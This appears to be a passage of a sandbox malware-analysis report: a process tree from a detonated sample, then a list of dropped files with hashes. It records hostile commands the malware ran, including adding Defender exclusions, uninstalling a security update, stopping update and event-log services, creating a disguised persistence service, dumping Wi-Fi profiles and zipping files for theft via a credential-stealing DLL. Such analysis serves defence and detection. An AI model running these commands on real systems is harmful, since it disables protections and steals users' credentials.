                                                                                                      C:\Users\Admin\AppData\Local\Temp\48AD.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:1220
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48AD.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\48AD.exe
                                                                                                        2⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        PID:988
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\Users\Admin\AppData\Local\f59b6df2-e75d-4e84-a2d0-a7e95b773a83" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                          3⤵
                                                                                                          • Modifies file permissions
                                                                                                          PID:468
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\48AD.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\48AD.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:3556
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\48AD.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\48AD.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4476
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 568
                                                                                                              5⤵
                                                                                                              • Program crash
                                                                                                              PID:2860
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4476 -ip 4476
                                                                                                      1⤵
                                                                                                        PID:1868
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5C75.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\5C75.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:1240
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                          2⤵
                                                                                                            PID:1644
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\filename.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                                                                                                              3⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Drops file in Drivers directory
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:1892
                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                4⤵
                                                                                                                  PID:3636
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                  4⤵
                                                                                                                    PID:2828
                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                      5⤵
                                                                                                                        PID:2372
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:464
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1644
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:2996
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3304
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:2772
                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                      4⤵
                                                                                                                        PID:208
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3488
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                        4⤵
                                                                                                                          PID:3008
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                          4⤵
                                                                                                                            PID:832
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                            4⤵
                                                                                                                              PID:3308
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                                                              4⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:4904
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                              4⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:4912
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                                                              4⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:2708
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2268 -ip 2268
                                                                                                                        1⤵
                                                                                                                          PID:4268
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2268 -ip 2268
                                                                                                                          1⤵
                                                                                                                            PID:1368
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C477.bat" "
                                                                                                                            1⤵
                                                                                                                              PID:2272
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                2⤵
                                                                                                                                  PID:1676
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CB6D.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CB6D.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:2972
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  PID:1612
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:3576
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DA05.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DA05.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3820
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:2904
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 1084
                                                                                                                                    2⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:2596
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E243.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E243.exe
                                                                                                                                  1⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:3000
                                                                                                                                • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                  C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                  1⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:2032
                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:1040
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                    2⤵
                                                                                                                                      PID:3968
                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        3⤵
                                                                                                                                          PID:1996
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:1680
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2612
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:3424
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:4508
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:3548
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                        2⤵
                                                                                                                                          PID:1540
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                          2⤵
                                                                                                                                            PID:1644
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            2⤵
                                                                                                                                              PID:4808
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                              2⤵
                                                                                                                                                PID:3868
                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                C:\Windows\system32\conhost.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:5116
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  explorer.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1948
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  PID:3476
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000316001\dayroc.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000316001\dayroc.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4964
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nine.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\nine.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4996
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 448
                                                                                                                                                            4⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:4452
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2948
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 372
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:988
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 388
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:5064
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 392
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:4740
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 680
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:1392
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 724
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:3720
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 744
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:4232
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 768
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:1148
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 784
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:3224
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3424
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 316
                                                                                                                                                                4⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:2256
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000318001\rdp1234.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000318001\rdp1234.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3004
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000319001\for.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000319001\for.exe"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1320
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4548
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2032
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:860
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000320001\lolololoMRK123.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000320001\lolololoMRK123.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1460
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:216
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1220
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              PID:2964
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 816
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              PID:3492
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1060
                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3000
                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                  netsh wlan show profiles
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:776
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\497073144238_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1152
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000321001\National.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000321001\National.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2772
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:464
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000323001\redline1234min.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000323001\redline1234min.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4020
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          C:\Windows\system32\sc.exe delete "FLWCUERA"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          PID:2588
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          PID:540
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000326001\pcsteal.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000326001\pcsteal.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4848
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4996 -ip 4996
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3500
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3424 -ip 3424
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:692
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2948 -ip 2948
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2264
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2948 -ip 2948
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2364
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2948 -ip 2948
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:116
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2948 -ip 2948
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2232
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2948 -ip 2948
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:636
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3820 -ip 3820
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3868
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2948 -ip 2948
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:2032
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2948 -ip 2948
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3944
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2268 -ip 2268
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2116
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2948 -ip 2948
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1368
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 216 -ip 216
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1320
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 216 -ip 216
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2856
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2268 -ip 2268
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3628

                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                    • C:\ProgramData\Are.docx

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                    • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      593KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                    • C:\ProgramData\nss3.dll

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.9MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5b1411077afd968b1dfd6b465f8117c0

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      adbd15191ee0505f09a110c085164e0c85731405

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5f4fea43a900ee1cff4c67fc4b08d3fa856e8f9024986ff49cf1a355296e529a

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      6655a778035fb60201702b80f64e81092c0fd39692e53d1703fb191aff87691d4245cafc6bfa61d47aa68531eab14c554a1d0d6f8081da1e85d5afc6bb92e358

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000316001\dayroc.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4.5MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      9e4d1c2ddddb0bb9ab403a7540fcb44c

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      9d3d818c60aca0d501133497055fe43dd1d8f2c6

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      cb6fd0e4779453133de64e1af45a7489ce2e858f7024b792f03c9be549afb84b

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      15932b3b10c53ee596101085a0df42218f8c94553cb36d2b5bc384a679288b82eacc5bb52c18ae565426bbccc7c8d4a7a9cbd3df6ee3e60e968de28c0ef8812e

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000318001\rdp1234.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      313KB

                                                                                                                                                                                                                      MD5

